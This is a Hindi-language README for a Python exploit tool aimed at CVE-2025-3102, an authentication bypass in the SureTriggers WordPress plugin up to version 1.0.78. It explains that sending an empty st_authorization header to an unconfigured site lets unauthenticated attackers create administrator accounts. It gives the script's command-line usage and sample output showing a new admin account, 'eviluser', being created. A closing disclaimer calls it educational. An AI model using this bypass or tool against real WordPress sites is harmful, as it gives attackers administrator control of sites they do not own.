
Wordpress SureTriggers <= 1.0.78 - रिक्त मान जांच की कमी के कारण प्राधिकरण बाईपास से अनप्रमाणित व्यवस्थापकीय उपयोगकर्ता निर्माण
🚨 CVE-2025-3102 एक गंभीर प्रमाणीकरण बाईपास भेद्यता है जो SureTriggers: All-in-One Automation Platform WordPress प्लगइन को प्रभावित करती है, जो 100,000 से अधिक वेबसाइटों पर सक्रिय रूप से इंस्टॉल है। दोष की प्रकृति और तैनाती के पैमाने के कारण, यह भेद्यता एक महत्वपूर्ण सुरक्षा जोखिम पैदा करती है।
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HSureTriggers WordPress प्लगइन एक प्रमाणीकरण बाईपास के प्रति संवेदनशील है जो अनधिकृत हमलावरों को व्यवस्थापक खाते बनाने की अनुमति देता है। यह autheticate_user फ़ंक्शन के अंदर secret_key पर लापता खाली मान जांच के कारण होता है।
जब प्लगइन इंस्टॉल और सक्रिय होता है लेकिन API कुंजी के साथ कॉन्फ़िगर नहीं होता, तो हमलावर खाली st_authorization हेडर भेजकर प्रमाणीकरण को बाईपास कर सकते हैं, जिससे प्रमाणित उपयोगकर्ताओं के लिए आरक्षित क्रियाएं ट्रिगर होती हैं।
इस भेद्यता के शोषण को स्वचालित करने के लिए एक Python स्क्रिप्ट प्रदान की गई है।
यह स्क्रिप्ट आपको कमजोर साइटों पर एक नया व्यवस्थापक उपयोगकर्ता बनाने की अनुमति देती है।
readme.txt के माध्यम से प्लगइन संस्करण का स्वचालित पता लगानाst_authorization हेडर का उपयोग करके प्रमाणीकरण बाईपासusage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है।
स्पष्ट अनुमति के बिना लक्ष्यों के विरुद्ध इस कोड का अनधिकृत उपयोग अवैध है।
लेखक किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।
द्वारा: Nxploited ( Khaled Alenazi )